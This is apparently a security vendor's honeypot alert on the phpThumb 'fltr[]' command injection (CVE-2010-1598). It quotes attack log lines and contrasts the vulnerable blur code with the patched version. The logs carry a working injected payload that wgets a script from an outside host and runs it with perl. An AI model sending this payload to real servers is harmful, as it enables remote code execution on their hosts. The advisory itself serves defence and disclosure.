[Honeypot Alert] phpThumb() 'fltr[]' Parameter Command Injection Detected

The SpiderLabs Research Team has identified active scanning for the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability in our web server honeypot logs. Here is the vulnerability info as described by SecurityFocus:

Bugtraq ID:39605
Class:Input Validation Error
CVE:CVE-2010-1598
Remote:Yes
Local:No
Published:Apr 21 2010 12:00AM
Updated:Nov 22 2011 07:39PM
Credit:M4g
Vulnerable:phpThumb phpThumb() 1.7.9 Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26 FLEXIcontent FLEXIcontent 1.5.3cFLEXIcontent FLEXIcontent 1.5.3B

Here are some Apache access_log examples:

94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"

We have seen scanning from the following hosts:

115.178.22.206116.12.168.232161.139.195.191189.87.233.5195.248.231.180200.134.25.51206.212.253.225213.195.65.16217.79.182.3862.212.67.7770.169.147.2191.121.137.8791.121.151.15591.121.152.10591.121.160.16091.121.168.4591.121.208.19991.121.22.10791.121.3.4191.121.5.21191.121.90.18594.23.10.7694.23.19.18294.23.196.14294.23.205.18094.23.214.10194.23.216.5594.23.230.10394.23.232.19094.23.244.13894.23.27.17094.23.39.1694.23.42.12194.23.47.19894.23.61.47

By appending a semi-colon to the "blur" option of the fltr parameter, they attacker is able to execute OS level commands. Look at the phpthumb.class.php code:

function ImageMagickThumbnailToGD() {...    foreach ($this->fltr as $filterkey => $filtercommand) {     @list($command, $parameter) = explode('|', $filtercommand, 2);     switch ($command) {...      case 'blur':       if ($this->ImageMagickSwitchAvailable('blur')) {        @list($radius) = explode('|', $parameter);        $radius = ($radius ? $radius : 1);        $commandline .= ' -blur '.$radius;        unset($this->fltr[$filterkey]);       }       break;...    $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__);    $IMresult = phpthumb_functions::SafeExec($commandline);    clearstatcache();    if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) {     @unlink($IMtempSourceFilename);    }    if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) {     $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')');     $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);...}

This is then evaluated in the phpthumb.functions.php code without any input validation checks for the $command data. The phpthumb CHANGELOG states the following changes for v1.7.10:

v1.7.10 - April 24, 2011  * ImageMagickVersion() returned unknown-version for versions    with hyphenated subversion numbers    (thanks r34wang√ėuwaterloo*ca)  * replace all ereg* functions with preg* equivalents for    PHP v5.3.0+ compatability  * Bugfix: security vulnerabilities when used with ImageMagick

The updated "blur" code now enforces both a length restriction and also uses php escapeshellarg function:

case 'blur':                            if ($this->ImageMagickSwitchAvailable('blur')) {                                @list($radius) = explode('|', $parameter);                                $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1);                                $commandline .= ' -blur '.escapeshellarg($radius);                                $successfullyProcessedFilters[] = $filterkey;                            }                            break;

Trustwave reserves the right to review all comments in the discussion below. Please note that for security and other reasons, we may not approve comments containing links.